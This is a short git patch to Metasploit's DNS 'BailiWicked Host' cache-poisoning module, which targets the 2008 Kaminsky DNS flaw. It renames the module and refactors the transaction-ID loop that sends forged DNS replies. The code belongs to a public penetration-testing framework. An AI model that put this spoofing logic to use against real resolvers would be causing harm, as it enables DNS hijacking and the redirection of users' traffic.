From e0bdbacb5d0055040052f68a795a3227b1f52c3f Mon Sep 17 00:00:00 2001 From: HD Moore Date: Wed, 23 Jul 2008 23:09:21 +0000 Subject: [PATCH] Better XID mixing git-svn-id: file:///home/svn/framework3/trunk@5585 4d416f70-5f16-0410-b530-b9f4589650da --- modules/auxiliary/spoof/dns/bailiwicked_host.rb | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/modules/auxiliary/spoof/dns/bailiwicked_host.rb b/modules/auxiliary/spoof/dns/bailiwicked_host.rb index 5edf2016f1..182a734f9b 100644 --- a/modules/auxiliary/spoof/dns/bailiwicked_host.rb +++ b/modules/auxiliary/spoof/dns/bailiwicked_host.rb @@ -11,7 +11,7 @@ class Auxiliary::Spoof::Dns::BailiWickedHost < Msf::Auxiliary def initialize(info = {}) super(update_info(info, - 'Name' => 'DNS BailiWicked Attack', + 'Name' => 'DNS BailiWicked Host Attack', 'Description' => %q{ This exploit attacks a fairly ubiquitous flaw in DNS implementations which Dan Kaminsky found and disclosed ~Jul 2008. This exploit caches a single @@ -132,6 +132,7 @@ class Auxiliary::Spoof::Dns::BailiWickedHost < Msf::Auxiliary recons = datastore['RECONS'] xids = datastore['XIDS'].to_i ttl = datastore['TTL'].to_i + xidbase = rand(4)+2*10000 domain = hostname.match(/[^\x2e]+\x2e[^\x2e]+\x2e$/)[0] @@ -272,8 +273,7 @@ class Auxiliary::Spoof::Dns::BailiWickedHost < Msf::Auxiliary req.qr = 1 req.ra = 1 - p = rand(4)+2*10000 - p.upto(p+xids-1) do |id| + xidbase.upto(xidbase+xids-1) do |id| req.id = id barbs.each do |barb| buff = (